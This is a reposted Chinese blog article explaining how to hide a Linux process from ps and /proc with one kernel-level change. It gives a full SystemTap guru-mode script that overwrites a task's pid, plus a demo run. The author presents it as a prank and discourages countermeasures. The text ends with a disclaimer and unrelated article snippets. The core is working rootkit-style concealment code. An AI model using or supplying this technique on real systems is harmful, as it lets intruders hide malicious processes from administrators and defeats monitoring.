时间:2021-05-02
总有朋友问隐藏Linux进程的方法,我说你想隐藏到什么程度,是大隐于内核,还是小隐于用户。
网上通篇论述的无外乎hook掉procfs或者类似的用户态方案,也都难免长篇大论,我说,这些场面都太大了,太复杂了。对于希望马上看到效果的而言,看到这么一堆复杂的东西,大概率望而却步。
本文介绍一种将Linux进程小隐于用户的非常规方法,仅仅一行代码:
修改掉进程的pid即可。
注意是小隐,所以,不值得反制,逗一下高级会议工程师搞个恶作剧玩玩得了。
target->pid = 0x7fffffff;
完整的脚本如下:
? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #!/usr/bin/stap -g # hide.stp global pid; function hide(who:long) %{ struct task_struct *target; target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID); target->pid = 0x7fffffff; %} probe begin { pid = $1 hide(pid); exit(); }来来来,试一下:
? 1 2 3 4 [root@localhost system]# ./tohide & [1] 403 [root@localhost system]# ./hide.stp [root@localhost system]#用下面的命令可以检测所有可显示进程的二进制文件:
? 1 2 3 for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do ls -l /proc/$pid/exe; doneprocfs里没了,ps当然就检测不到了。
如果你觉得guru模式的stap怪怪的,那么你完全可以编写自己独立的Linux kernel module,采用修改完即退的方法:
? 1 2 target->pid = xxxx; return -1;是不是比各种hook法简单多了,所谓的 动数据而不要动代码!
简单的说一下原理。
不多说。
再次声明,不要试图对本文所描述的方法进行反制,因为这么简单的东西根本不值得反制,哈哈,不是吗?
可以参考我之前的Rootkit系列文章来继续研究Linux进程大隐于内核的方法。同时,每一种方法我都给出了反制措施。
到此这篇关于一行代码教你如何隐藏Linux进程的文章就介绍到这了,更多相关Linux隐藏进程内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!
原文链接:https://blog.csdn.net/dog250/article/details/108032383
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
然后在新文本的首行写入提取到的最后一行,用findstr语句过滤掉原文本的第一行和最后一行,在最后一行之后添加提取到的第一行。复制代码代码如下:@echooff
vue+elementUi实现密码显示/隐藏+小图标变化(js一共三行代码,其中一行为了美观)...,先给大家展示下效果图,感觉不错可以参考实现代码。【效果图】
1、nginx隐藏头部版本信息方法编辑nginx.conf配置文件,在http{}内增加如下一行复制代码代码如下:http{……se
本小节我们将学习同步和异步的概念同步是指下一行代码必须等待上一行代码执行完成,才执行。异步是指下一行代码不必等待上一行代码执行完成,才执行。同步的优点是,关心代
复制代码代码如下:@echooff::每6行拼接为一行,剩余的不够6行的显示在最后一行::::setnum=0setlocalenabledelayedexpa